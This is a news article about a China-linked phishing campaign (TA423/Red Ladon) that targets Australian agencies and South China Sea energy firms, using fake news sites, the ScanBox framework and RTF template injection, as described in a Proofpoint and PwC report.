Chinese Phishing Campaign Targets Victims in South China SeaCampaign Uses ScanBox Framework and RTF Template Injection
Chinese intelligence threat actors are conducting cyberespionage campaigns targeting the Australian government and corporations involved with energy extraction in the South China Sea, researchers say.
The campaign's latest guise is posing as Australian online media in a bid to get victims to enable a web reconnaissance and exploitation framework dubbed ScanBox that is likely used by multiple China-based threat actors, concludes a joint report from Proofpoint and PricewaterhouseCoopers.
The two companies assess with moderate confidence the campaign, which Proofpoint began to observe in March 2021, is the work of the threat actor known as TA423 or Red Ladon. Its activities overlap with a threat actor dubbed APT40 or Leviathan.
A 2021 indictment of Chinese hackers by the U.S. Department of Justice attributed the threat actors to the Ministry of State Security of the southern Chinese province of Hainan. Proofpoint and PwC researchers say that one of TA423’s longest running areas of responsibility is assessed to include the South China Sea (see: US Indicts 4 Chinese Nationals for Lengthy Hacking Campaign).
The phishing campaign is one sign of South China Sea regional tensions, where Beijing aggressively presses disputed territorial claims. "There is a clear and upward trend of PRC provocations against South China Sea claimants and other states lawfully operating in the region," a U.S. Department of State official told a Washington think tank audience, Reuters reported earlier this summer.
TA423 supports "the Chinese government in matters related to the South China Sea, including during the recent tensions in Taiwan," says Sherrod DeGrippo, Proofpoint vice president of threat research and detection, referring to Chinese objections to a Taipei visit by U.S. House Speaker Nancy Pelosi earlier this month.
"This group specifically wants to know who is active in the region and while we can't say for certain, their focus on naval issues is likely to remain a constant priority in places like Malaysia, Singapore, Taiwan and Australia," DeGrippo says.
Among the phishing campaign's targets are organizations connected with exploitation of the Kasawari offshore gas field in Malaysia's exclusive economic zone and an offshore wind farm in the Taiwan Strait.
In the latest campaign, detected in April and extending through June, threat actors targeted local and federal Australian governmental agencies, news media companies and global heavy industry manufacturers that conduct maintenance of fleets of wind turbines in the South China Sea.
These phishing campaigns originated from Gmail and Outlook email addresses. Frequently, the threat actor posed as an employee of the fictional media publication "Australian Morning News." The associated web domain contained content copied from legitimate news publications, including the BBC and Sky News.
The modularity is a bid to prevent crashes or errors that might tip off the owners of compromised websites, researchers say.
Researchers say that the initial script harvests data that helps set up the following stages of information gathering and potential follow-on exploitation or compromise.
RTF Template Injection
During an earlier campaign observed in March, the phishing campaigns used Rich Text Format template injection attachments leveraging template URLs customized for each target.
RTF template injection is a technique in which an RTF file containing decoy content can be altered to allow for the retrieval of content hosted at an external URL after opening an RTF file. The template is compatible with Microsoft Office, which makes it easier for a user to open or edit these documents, allowing attackers an opportunity to attack any system.
Although the campaign returned the same payload to all the victims, the URLs used were distinct. Each of them had a victim ID number that correlated to the intended victims and allowed attackers to track active infections.
"Notably, the recurring use of custom URLs that are unique to each victim, likely for infection tracking purposes, is a commonality to the ScanBox phishing URLs observed later in April 2022," researchers say.
One of the targets of the RTF campaign was a European manufacturer of heavy equipment used in building the Yunlin Offshore Wind Farm in the Taiwan Strait.